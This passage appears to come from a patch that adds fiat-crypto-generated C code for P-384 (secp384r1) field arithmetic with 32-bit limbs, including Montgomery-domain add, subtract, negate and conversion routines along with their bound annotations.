x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1570, &x1571, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1572, &x1573, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1574, &x1575, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1576, &x1577, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1578, &x1579, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1580, &x1581, x1540, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1582, &x1583, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1584, &x1585, x1540, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1586, &x1587, 0x0, x1583, x1580); ++ fiat_secp384r1_addcarryx_u32(&x1588, &x1589, x1587, x1581, x1578); ++ fiat_secp384r1_addcarryx_u32(&x1590, &x1591, x1589, x1579, x1576); ++ fiat_secp384r1_addcarryx_u32(&x1592, &x1593, x1591, x1577, x1574); ++ fiat_secp384r1_addcarryx_u32(&x1594, &x1595, x1593, x1575, x1572); ++ fiat_secp384r1_addcarryx_u32(&x1596, &x1597, x1595, x1573, x1570); ++ fiat_secp384r1_addcarryx_u32(&x1598, &x1599, x1597, x1571, x1568); ++ fiat_secp384r1_addcarryx_u32(&x1600, &x1601, x1599, x1569, x1566); ++ x1602 = (x1601 + x1567); ++ fiat_secp384r1_addcarryx_u32(&x1603, &x1604, 0x0, x1540, x1584); ++ fiat_secp384r1_addcarryx_u32(&x1605, &x1606, x1604, x1542, x1585); ++ fiat_secp384r1_addcarryx_u32(&x1607, &x1608, x1606, x1544, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1609, &x1610, x1608, x1546, x1582); ++ fiat_secp384r1_addcarryx_u32(&x1611, &x1612, x1610, x1548, x1586); ++ fiat_secp384r1_addcarryx_u32(&x1613, &x1614, x1612, x1550, x1588); ++ fiat_secp384r1_addcarryx_u32(&x1615, &x1616, x1614, x1552, x1590); ++ fiat_secp384r1_addcarryx_u32(&x1617, &x1618, x1616, x1554, x1592); ++ fiat_secp384r1_addcarryx_u32(&x1619, &x1620, x1618, x1556, x1594); ++ fiat_secp384r1_addcarryx_u32(&x1621, &x1622, x1620, x1558, x1596); ++ fiat_secp384r1_addcarryx_u32(&x1623, &x1624, x1622, x1560, x1598); ++ fiat_secp384r1_addcarryx_u32(&x1625, &x1626, x1624, x1562, x1600); ++ fiat_secp384r1_addcarryx_u32(&x1627, &x1628, x1626, x1564, x1602); ++ x1629 = ((uint32_t)x1628 + x1565); ++ fiat_secp384r1_subborrowx_u32(&x1630, &x1631, 0x0, x1605, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1632, &x1633, x1631, x1607, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x1634, &x1635, x1633, x1609, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x1636, &x1637, x1635, x1611, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1638, &x1639, x1637, x1613, ++ UINT32_C(0xfffffffe)); ++ fiat_secp384r1_subborrowx_u32(&x1640, &x1641, x1639, x1615, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1642, &x1643, x1641, x1617, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1644, &x1645, x1643, x1619, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1646, &x1647, x1645, x1621, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1648, &x1649, x1647, x1623, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1650, &x1651, x1649, x1625, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1652, &x1653, x1651, x1627, ++ UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x1654, &x1655, x1653, x1629, 0x0); ++ fiat_secp384r1_cmovznz_u32(&x1656, x1655, x1630, x1605); ++ fiat_secp384r1_cmovznz_u32(&x1657, x1655, x1632, x1607); ++ fiat_secp384r1_cmovznz_u32(&x1658, x1655, x1634, x1609); ++ fiat_secp384r1_cmovznz_u32(&x1659, x1655, x1636, x1611); ++ fiat_secp384r1_cmovznz_u32(&x1660, x1655, x1638, x1613); ++ fiat_secp384r1_cmovznz_u32(&x1661, x1655, x1640, x1615); ++ fiat_secp384r1_cmovznz_u32(&x1662, x1655, x1642, x1617); ++ fiat_secp384r1_cmovznz_u32(&x1663, x1655, x1644, x1619); ++ fiat_secp384r1_cmovznz_u32(&x1664, x1655, x1646, x1621); ++ fiat_secp384r1_cmovznz_u32(&x1665, x1655, x1648, x1623); ++ fiat_secp384r1_cmovznz_u32(&x1666, x1655, x1650, x1625); ++ fiat_secp384r1_cmovznz_u32(&x1667, x1655, x1652, x1627); ++ out1[0] = x1656; ++ out1[1] = x1657; ++ out1[2] = x1658; ++ out1[3] = x1659; ++ out1[4] = x1660; ++ out1[5] = x1661; ++ out1[6] = x1662; ++ out1[7] = x1663; ++ out1[8] = x1664; ++ out1[9] = x1665; ++ out1[10] = x1666; ++ out1[11] = x1667; ++} ++ ++/* ++ * The function fiat_secp384r1_add adds two field elements in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * 0 ≤ eval arg2 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) + eval (from_montgomery arg2)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * arg2: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_add(uint32_t out1[12], const uint32_t arg1[12], ++ const uint32_t arg2[12]) ++{ ++ uint32_t x1; ++ fiat_secp384r1_uint1 x2; ++ uint32_t x3; ++ fiat_secp384r1_uint1 x4; ++ uint32_t x5; ++ fiat_secp384r1_uint1 x6; ++ uint32_t x7; ++ fiat_secp384r1_uint1 x8; ++ uint32_t x9; ++ fiat_secp384r1_uint1 x10; ++ uint32_t x11; ++ fiat_secp384r1_uint1 x12; ++ uint32_t x13; ++ fiat_secp384r1_uint1 x14; ++ uint32_t x15; ++ fiat_secp384r1_uint1 x16; ++ uint32_t x17; ++ fiat_secp384r1_uint1 x18; ++ uint32_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint32_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint32_t x23; ++ fiat_secp384r1_uint1 x24; ++ uint32_t x25; ++ fiat_secp384r1_uint1 x26; ++ uint32_t x27; ++ fiat_secp384r1_uint1 x28; ++ uint32_t x29; ++ fiat_secp384r1_uint1 x30; ++ uint32_t x31; ++ fiat_secp384r1_uint1 x32; ++ uint32_t x33; ++ fiat_secp384r1_uint1 x34; ++ uint32_t x35; ++ fiat_secp384r1_uint1 x36; ++ uint32_t x37; ++ fiat_secp384r1_uint1 x38; ++ uint32_t x39; ++ fiat_secp384r1_uint1 x40; ++ uint32_t x41; ++ fiat_secp384r1_uint1 x42; ++ uint32_t x43; ++ fiat_secp384r1_uint1 x44; ++ uint32_t x45; ++ fiat_secp384r1_uint1 x46; ++ uint32_t x47; ++ fiat_secp384r1_uint1 x48; ++ uint32_t x49; ++ fiat_secp384r1_uint1 x50; ++ uint32_t x51; ++ uint32_t x52; ++ uint32_t x53; ++ uint32_t x54; ++ uint32_t x55; ++ uint32_t x56; ++ uint32_t x57; ++ uint32_t x58; ++ uint32_t x59; ++ uint32_t x60; ++ uint32_t x61; ++ uint32_t x62; ++ fiat_secp384r1_addcarryx_u32(&x1, &x2, 0x0, (arg1[0]), (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x3, &x4, x2, (arg1[1]), (arg2[1])); ++ fiat_secp384r1_addcarryx_u32(&x5, &x6, x4, (arg1[2]), (arg2[2])); ++ fiat_secp384r1_addcarryx_u32(&x7, &x8, x6, (arg1[3]), (arg2[3])); ++ fiat_secp384r1_addcarryx_u32(&x9, &x10, x8, (arg1[4]), (arg2[4])); ++ fiat_secp384r1_addcarryx_u32(&x11, &x12, x10, (arg1[5]), (arg2[5])); ++ fiat_secp384r1_addcarryx_u32(&x13, &x14, x12, (arg1[6]), (arg2[6])); ++ fiat_secp384r1_addcarryx_u32(&x15, &x16, x14, (arg1[7]), (arg2[7])); ++ fiat_secp384r1_addcarryx_u32(&x17, &x18, x16, (arg1[8]), (arg2[8])); ++ fiat_secp384r1_addcarryx_u32(&x19, &x20, x18, (arg1[9]), (arg2[9])); ++ fiat_secp384r1_addcarryx_u32(&x21, &x22, x20, (arg1[10]), (arg2[10])); ++ fiat_secp384r1_addcarryx_u32(&x23, &x24, x22, (arg1[11]), (arg2[11])); ++ fiat_secp384r1_subborrowx_u32(&x25, &x26, 0x0, x1, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x27, &x28, x26, x3, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x29, &x30, x28, x5, 0x0); ++ fiat_secp384r1_subborrowx_u32(&x31, &x32, x30, x7, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x33, &x34, x32, x9, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_subborrowx_u32(&x35, &x36, x34, x11, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x37, &x38, x36, x13, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x39, &x40, x38, x15, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x41, &x42, x40, x17, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x43, &x44, x42, x19, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x45, &x46, x44, x21, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x47, &x48, x46, x23, UINT32_C(0xffffffff)); ++ fiat_secp384r1_subborrowx_u32(&x49, &x50, x48, x24, 0x0); ++ fiat_secp384r1_cmovznz_u32(&x51, x50, x25, x1); ++ fiat_secp384r1_cmovznz_u32(&x52, x50, x27, x3); ++ fiat_secp384r1_cmovznz_u32(&x53, x50, x29, x5); ++ fiat_secp384r1_cmovznz_u32(&x54, x50, x31, x7); ++ fiat_secp384r1_cmovznz_u32(&x55, x50, x33, x9); ++ fiat_secp384r1_cmovznz_u32(&x56, x50, x35, x11); ++ fiat_secp384r1_cmovznz_u32(&x57, x50, x37, x13); ++ fiat_secp384r1_cmovznz_u32(&x58, x50, x39, x15); ++ fiat_secp384r1_cmovznz_u32(&x59, x50, x41, x17); ++ fiat_secp384r1_cmovznz_u32(&x60, x50, x43, x19); ++ fiat_secp384r1_cmovznz_u32(&x61, x50, x45, x21); ++ fiat_secp384r1_cmovznz_u32(&x62, x50, x47, x23); ++ out1[0] = x51; ++ out1[1] = x52; ++ out1[2] = x53; ++ out1[3] = x54; ++ out1[4] = x55; ++ out1[5] = x56; ++ out1[6] = x57; ++ out1[7] = x58; ++ out1[8] = x59; ++ out1[9] = x60; ++ out1[10] = x61; ++ out1[11] = x62; ++} ++ ++/* ++ * The function fiat_secp384r1_sub subtracts two field elements in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * 0 ≤ eval arg2 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) - eval (from_montgomery arg2)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * arg2: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_sub(uint32_t out1[12], const uint32_t arg1[12], ++ const uint32_t arg2[12]) ++{ ++ uint32_t x1; ++ fiat_secp384r1_uint1 x2; ++ uint32_t x3; ++ fiat_secp384r1_uint1 x4; ++ uint32_t x5; ++ fiat_secp384r1_uint1 x6; ++ uint32_t x7; ++ fiat_secp384r1_uint1 x8; ++ uint32_t x9; ++ fiat_secp384r1_uint1 x10; ++ uint32_t x11; ++ fiat_secp384r1_uint1 x12; ++ uint32_t x13; ++ fiat_secp384r1_uint1 x14; ++ uint32_t x15; ++ fiat_secp384r1_uint1 x16; ++ uint32_t x17; ++ fiat_secp384r1_uint1 x18; ++ uint32_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint32_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint32_t x23; ++ fiat_secp384r1_uint1 x24; ++ uint32_t x25; ++ uint32_t x26; ++ fiat_secp384r1_uint1 x27; ++ uint32_t x28; ++ fiat_secp384r1_uint1 x29; ++ uint32_t x30; ++ fiat_secp384r1_uint1 x31; ++ uint32_t x32; ++ fiat_secp384r1_uint1 x33; ++ uint32_t x34; ++ fiat_secp384r1_uint1 x35; ++ uint32_t x36; ++ fiat_secp384r1_uint1 x37; ++ uint32_t x38; ++ fiat_secp384r1_uint1 x39; ++ uint32_t x40; ++ fiat_secp384r1_uint1 x41; ++ uint32_t x42; ++ fiat_secp384r1_uint1 x43; ++ uint32_t x44; ++ fiat_secp384r1_uint1 x45; ++ uint32_t x46; ++ fiat_secp384r1_uint1 x47; ++ uint32_t x48; ++ fiat_secp384r1_uint1 x49; ++ fiat_secp384r1_subborrowx_u32(&x1, &x2, 0x0, (arg1[0]), (arg2[0])); ++ fiat_secp384r1_subborrowx_u32(&x3, &x4, x2, (arg1[1]), (arg2[1])); ++ fiat_secp384r1_subborrowx_u32(&x5, &x6, x4, (arg1[2]), (arg2[2])); ++ fiat_secp384r1_subborrowx_u32(&x7, &x8, x6, (arg1[3]), (arg2[3])); ++ fiat_secp384r1_subborrowx_u32(&x9, &x10, x8, (arg1[4]), (arg2[4])); ++ fiat_secp384r1_subborrowx_u32(&x11, &x12, x10, (arg1[5]), (arg2[5])); ++ fiat_secp384r1_subborrowx_u32(&x13, &x14, x12, (arg1[6]), (arg2[6])); ++ fiat_secp384r1_subborrowx_u32(&x15, &x16, x14, (arg1[7]), (arg2[7])); ++ fiat_secp384r1_subborrowx_u32(&x17, &x18, x16, (arg1[8]), (arg2[8])); ++ fiat_secp384r1_subborrowx_u32(&x19, &x20, x18, (arg1[9]), (arg2[9])); ++ fiat_secp384r1_subborrowx_u32(&x21, &x22, x20, (arg1[10]), (arg2[10])); ++ fiat_secp384r1_subborrowx_u32(&x23, &x24, x22, (arg1[11]), (arg2[11])); ++ fiat_secp384r1_cmovznz_u32(&x25, x24, 0x0, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x26, &x27, 0x0, x1, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x28, &x29, x27, x3, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x30, &x31, x29, x5, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x32, &x33, x31, x7, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x34, &x35, x33, x9, ++ (x25 & UINT32_C(0xfffffffe))); ++ fiat_secp384r1_addcarryx_u32(&x36, &x37, x35, x11, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x38, &x39, x37, x13, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x40, &x41, x39, x15, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x42, &x43, x41, x17, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x44, &x45, x43, x19, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x46, &x47, x45, x21, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x48, &x49, x47, x23, ++ (x25 & UINT32_C(0xffffffff))); ++ out1[0] = x26; ++ out1[1] = x28; ++ out1[2] = x30; ++ out1[3] = x32; ++ out1[4] = x34; ++ out1[5] = x36; ++ out1[6] = x38; ++ out1[7] = x40; ++ out1[8] = x42; ++ out1[9] = x44; ++ out1[10] = x46; ++ out1[11] = x48; ++} ++ ++/* ++ * The function fiat_secp384r1_opp negates a field element in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = -eval (from_montgomery arg1) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_opp(uint32_t out1[12], const uint32_t arg1[12]) ++{ ++ uint32_t x1; ++ fiat_secp384r1_uint1 x2; ++ uint32_t x3; ++ fiat_secp384r1_uint1 x4; ++ uint32_t x5; ++ fiat_secp384r1_uint1 x6; ++ uint32_t x7; ++ fiat_secp384r1_uint1 x8; ++ uint32_t x9; ++ fiat_secp384r1_uint1 x10; ++ uint32_t x11; ++ fiat_secp384r1_uint1 x12; ++ uint32_t x13; ++ fiat_secp384r1_uint1 x14; ++ uint32_t x15; ++ fiat_secp384r1_uint1 x16; ++ uint32_t x17; ++ fiat_secp384r1_uint1 x18; ++ uint32_t x19; ++ fiat_secp384r1_uint1 x20; ++ uint32_t x21; ++ fiat_secp384r1_uint1 x22; ++ uint32_t x23; ++ fiat_secp384r1_uint1 x24; ++ uint32_t x25; ++ uint32_t x26; ++ fiat_secp384r1_uint1 x27; ++ uint32_t x28; ++ fiat_secp384r1_uint1 x29; ++ uint32_t x30; ++ fiat_secp384r1_uint1 x31; ++ uint32_t x32; ++ fiat_secp384r1_uint1 x33; ++ uint32_t x34; ++ fiat_secp384r1_uint1 x35; ++ uint32_t x36; ++ fiat_secp384r1_uint1 x37; ++ uint32_t x38; ++ fiat_secp384r1_uint1 x39; ++ uint32_t x40; ++ fiat_secp384r1_uint1 x41; ++ uint32_t x42; ++ fiat_secp384r1_uint1 x43; ++ uint32_t x44; ++ fiat_secp384r1_uint1 x45; ++ uint32_t x46; ++ fiat_secp384r1_uint1 x47; ++ uint32_t x48; ++ fiat_secp384r1_uint1 x49; ++ fiat_secp384r1_subborrowx_u32(&x1, &x2, 0x0, 0x0, (arg1[0])); ++ fiat_secp384r1_subborrowx_u32(&x3, &x4, x2, 0x0, (arg1[1])); ++ fiat_secp384r1_subborrowx_u32(&x5, &x6, x4, 0x0, (arg1[2])); ++ fiat_secp384r1_subborrowx_u32(&x7, &x8, x6, 0x0, (arg1[3])); ++ fiat_secp384r1_subborrowx_u32(&x9, &x10, x8, 0x0, (arg1[4])); ++ fiat_secp384r1_subborrowx_u32(&x11, &x12, x10, 0x0, (arg1[5])); ++ fiat_secp384r1_subborrowx_u32(&x13, &x14, x12, 0x0, (arg1[6])); ++ fiat_secp384r1_subborrowx_u32(&x15, &x16, x14, 0x0, (arg1[7])); ++ fiat_secp384r1_subborrowx_u32(&x17, &x18, x16, 0x0, (arg1[8])); ++ fiat_secp384r1_subborrowx_u32(&x19, &x20, x18, 0x0, (arg1[9])); ++ fiat_secp384r1_subborrowx_u32(&x21, &x22, x20, 0x0, (arg1[10])); ++ fiat_secp384r1_subborrowx_u32(&x23, &x24, x22, 0x0, (arg1[11])); ++ fiat_secp384r1_cmovznz_u32(&x25, x24, 0x0, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x26, &x27, 0x0, x1, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x28, &x29, x27, x3, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x30, &x31, x29, x5, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x32, &x33, x31, x7, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x34, &x35, x33, x9, ++ (x25 & UINT32_C(0xfffffffe))); ++ fiat_secp384r1_addcarryx_u32(&x36, &x37, x35, x11, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x38, &x39, x37, x13, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x40, &x41, x39, x15, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x42, &x43, x41, x17, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x44, &x45, x43, x19, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x46, &x47, x45, x21, ++ (x25 & UINT32_C(0xffffffff))); ++ fiat_secp384r1_addcarryx_u32(&x48, &x49, x47, x23, ++ (x25 & UINT32_C(0xffffffff))); ++ out1[0] = x26; ++ out1[1] = x28; ++ out1[2] = x30; ++ out1[3] = x32; ++ out1[4] = x34; ++ out1[5] = x36; ++ out1[6] = x38; ++ out1[7] = x40; ++ out1[8] = x42; ++ out1[9] = x44; ++ out1[10] = x46; ++ out1[11] = x48; ++} ++ ++/* ++ * The function fiat_secp384r1_from_montgomery translates a field element out of the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * eval out1 mod m = (eval arg1 * ((2^32)⁻¹ mod m)^12) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_from_montgomery(uint32_t out1[12], ++ const uint32_t arg1[12]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint32_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint32_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint32_t x12; ++ uint32_t x13; ++ uint32_t x14; ++ uint32_t x15; ++ uint32_t x16; ++ uint32_t x17; ++ uint32_t x18; ++ uint32_t x19; ++ uint32_t x20; ++ uint32_t x21; ++ uint32_t x22; ++ fiat_secp384r1_uint1 x23; ++ uint32_t x24; ++ fiat_secp384r1_uint1 x25; ++ uint32_t x26; ++ fiat_secp384r1_uint1 x27; ++ uint32_t x28; ++ fiat_secp384r1_uint1 x29; ++ uint32_t x30; ++ fiat_secp384r1_uint1 x31; ++ uint32_t x32; ++ fiat_secp384r1_uint1 x33; ++ uint32_t x34; ++ fiat_secp384r1_uint1 x35; ++ uint32_t x36; ++ fiat_secp384r1_uint1 x37; ++ uint32_t x38; ++ fiat_secp384r1_uint1 x39; ++ uint32_t x40; ++ fiat_secp384r1_uint1 x41; ++ uint32_t x42; ++ uint32_t x43; ++ uint32_t x44; ++ uint32_t x45; ++ uint32_t x46; ++ uint32_t x47; ++ uint32_t x48; ++ uint32_t x49; ++ uint32_t x50; ++ uint32_t x51; ++ uint32_t x52; ++ uint32_t x53; ++ uint32_t x54; ++ uint32_t x55; ++ uint32_t x56; ++ uint32_t x57; ++ uint32_t x58; ++ uint32_t x59; ++ uint32_t x60; ++ uint32_t x61; ++ uint32_t x62; ++ fiat_secp384r1_uint1 x63; ++ uint32_t x64; ++ fiat_secp384r1_uint1 x65; ++ uint32_t x66; ++ fiat_secp384r1_uint1 x67; ++ uint32_t x68; ++ fiat_secp384r1_uint1 x69; ++ uint32_t x70; ++ fiat_secp384r1_uint1 x71; ++ uint32_t x72; ++ fiat_secp384r1_uint1 x73; ++ uint32_t x74; ++ fiat_secp384r1_uint1 x75; ++ uint32_t x76; ++ fiat_secp384r1_uint1 x77; ++ uint32_t x78; ++ fiat_secp384r1_uint1 x79; ++ uint32_t x80; ++ fiat_secp384r1_uint1 x81; ++ uint32_t x82; ++ fiat_secp384r1_uint1 x83; ++ uint32_t x84; ++ fiat_secp384r1_uint1 x85; ++ uint32_t x86; ++ fiat_secp384r1_uint1 x87; ++ uint32_t x88; ++ fiat_secp384r1_uint1 x89; ++ uint32_t x90; ++ fiat_secp384r1_uint1 x91; ++ uint32_t x92; ++ fiat_secp384r1_uint1 x93; ++ uint32_t x94; ++ fiat_secp384r1_uint1 x95; ++ uint32_t x96; ++ fiat_secp384r1_uint1 x97; ++ uint32_t x98; ++ fiat_secp384r1_uint1 x99; ++ uint32_t x100; ++ fiat_secp384r1_uint1 x101; ++ uint32_t x102; ++ fiat_secp384r1_uint1 x103; ++ uint32_t x104; ++ fiat_secp384r1_uint1 x105; ++ uint32_t x106; ++ fiat_secp384r1_uint1 x107; ++ uint32_t x108; ++ fiat_secp384r1_uint1 x109; ++ uint32_t x110; ++ fiat_secp384r1_uint1 x111; ++ uint32_t x112; ++ fiat_secp384r1_uint1 x113; ++ uint32_t x114; ++ fiat_secp384r1_uint1 x115; ++ uint32_t x116; ++ fiat_secp384r1_uint1 x117; ++ uint32_t x118; ++ fiat_secp384r1_uint1 x119; ++ uint32_t x120; ++ fiat_secp384r1_uint1 x121; ++ uint32_t x122; ++ fiat_secp384r1_uint1 x123; ++ uint32_t x124; ++ fiat_secp384r1_uint1 x125; ++ uint32_t x126; ++ fiat_secp384r1_uint1 x127; ++ uint32_t x128; ++ uint32_t x129; ++ uint32_t x130; ++ uint32_t x131; ++ uint32_t x132; ++ uint32_t x133; ++ uint32_t x134; ++ uint32_t x135; ++ uint32_t x136; ++ uint32_t x137; ++ uint32_t x138; ++ uint32_t x139; ++ uint32_t x140; ++ uint32_t x141; ++ uint32_t x142; ++ uint32_t x143; ++ uint32_t x144; ++ uint32_t x145; ++ uint32_t x146; ++ uint32_t x147; ++ uint32_t x148; ++ fiat_secp384r1_uint1 x149; ++ uint32_t x150; ++ fiat_secp384r1_uint1 x151; ++ uint32_t x152; ++ fiat_secp384r1_uint1 x153; ++ uint32_t x154; ++ fiat_secp384r1_uint1 x155; ++ uint32_t x156; ++ fiat_secp384r1_uint1 x157; ++ uint32_t x158; ++ fiat_secp384r1_uint1 x159; ++ uint32_t 